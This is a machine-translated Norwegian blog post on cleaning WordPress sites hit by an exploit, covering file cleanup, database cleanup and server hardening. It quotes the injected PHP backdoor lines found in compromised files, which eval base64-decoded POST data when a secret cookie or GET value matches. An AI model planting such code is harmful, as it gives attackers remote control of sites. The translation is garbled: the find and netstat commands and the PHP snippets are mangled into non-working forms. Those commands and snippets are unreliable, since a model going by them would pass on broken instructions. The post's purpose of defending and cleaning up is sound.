WordPress Exploit - rengjøring av kompromitterte filer og SQL Server sikkerhet.

Før du leser dette innlegget, skal du se , For å forstå noe. :)

Vi fant i flere av bloggene på stealthsettings.com filer, lik koden under virusarii oppstår fra WordPress utnytte.:

? <Php if ($ _ GET [ '573abcb060974771'] == "8e96d1b4b674e1d2") {EVAL (base64_decode ($ _ POST [ 'fil'])); exit; }?>

si

<?php if($_COOKIE[XCHARX44e827f9fbeca184XCHARX]==XCHARX5cd3c94b4b1c57eaXCHARX){ eval(base64_decode($_POST[XCHARXfileXCHARX])); exit; } ?>

xmlrpcHvis det er over fil xmlrpc.php fra SleepyMen på et grep server, kan du se at det er ganske mange av sitt slag i kildekoden.

pppffiuuu

Rense infiserte filer:

Ooookkkk ...
1. Den beste løsningen, etter at det hadde backupOg renset med databasen er å tørk filer WordPress (Du kan holde wp-config.php og filer som ikke er knyttet strengt wp plattform, etter å ha blitt nøye sjekket) på serveren og ikke laste den opprinnelige versjonen 2.5.1 (Under dette gjør en WP versjonsoppgradering :)) http://wordpress.org/download/ . Tørk inkludert tema-filer hvis du ikke stoler på at deres omhyggelig kontroll.

Det synes å ha blitt påvirket og filer av temaene som ikke har vært brukt før på bloggen og bare endre tema, ikke løser problemet.

./andreea/wp-content/themes/default/index.php:<?php if ($ _ COOKIE ['44e827f9fbeca184'] == '5cd3c94b4b1c57ea ") {eval (base64_decode ($ _ POST [' file '])); exit; ?}> <Php get_header (); ?>

2. Søk etter og slett alle filer som inneholder: * _new.php, * _old.php, * Jpgg, * Giff, * Pngg og fil wp-info.txt, hvis noen....

Finne. -Navn "* _new.php"
Finne. -Navn "* _old.php"
Finne. -Navn "*. Jpgg"
Finne. -Navn "* _giff"
Finne. -Navn "* _pngg"
Finne. -Name "wp-info.txt"

3. i / Tmp , Søk og slette mapper som tmpYwbzT2

SQL Rengjøring :

1. i tabell Tabell wp_options se om det er slette linjene: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Også i wp_options, gå til active_plugins og slett om det er en plugin som ender i en av filtypene * _new.php, * _old.php, *. jpgg, *. GIFF, *. pngg eller hvis en annen utvidelse er mistenkt, sjekk nøye.

3. I tabell wp_users, Se om det er en bruker som ikke har skrevet noe i sin rett, kolonnen user_nicename. Slett denne brukeren, men legg merke til nummeret på ID-kolonnen. Denne brukeren kan bruke "WordPress" som user_login og synes å være laget på 00: 00: 00 0000-00-00.

4. Gå til Table wp_usermeta og slette alle linjene som tilhører ID ovenfor.

Når du har gjort dette sql rengjøring, deaktivere og deretter aktivere noen plugin. (I bloggen -> Dashboard -> Plugins)

Sikker server:

1. Se hva kataloger og filer er "skrivbar"(Chmod 777) og prøve å sette på dem en chmod som ikke ville tillate at deres skriving på alle nivå. (644 chmod, for eksempel)

Finne. -Perm-2-ls

2. Se hva filene har litt sett suid eller sgid . Hvis du ikke bruker disse filene satt på dem chmod 0 eller avinstallere pakken at den inneholder. Er svært farlig, fordi de kjørerettigheter "gruppe"Eller"root"Og ikke med vanlig bruker rettighetene til å utføre denne filen.

finne /-type f-perm-04000-ls
finne /-type f-perm-02000-ls

3. Sjekk hvilke porter som er åpne og prøver å lukke eller sikre de som ikke er brukt.

netstat-an | grep-i lytte

Om det. Jeg ser Google Search og andre sier "Vel du gjorde!". Vel bra du har gjort ... men hva om hvis google begynner å forby alle områder forming Er spam og sette trojanere (Trojan.Clicker.HTML) I cookies?

WordPress Exploit - rengjøring av kompromitterte filer og SQL Server sikkerhet.

Om forfatteren

Stealth

Lidenskapelig opptatt av alt som gadget og IT skrive gjerne stealthsettings.com av 2006 og jeg liker å oppdage nye ting med deg om datamaskiner og MacOS, Linux, Windows, iOS og Android.

1 Kommentar

Legg igjen en kommentar

Dette nettstedet bruker Akismet for å redusere spam. Lær hvordan kommentaren din behandles.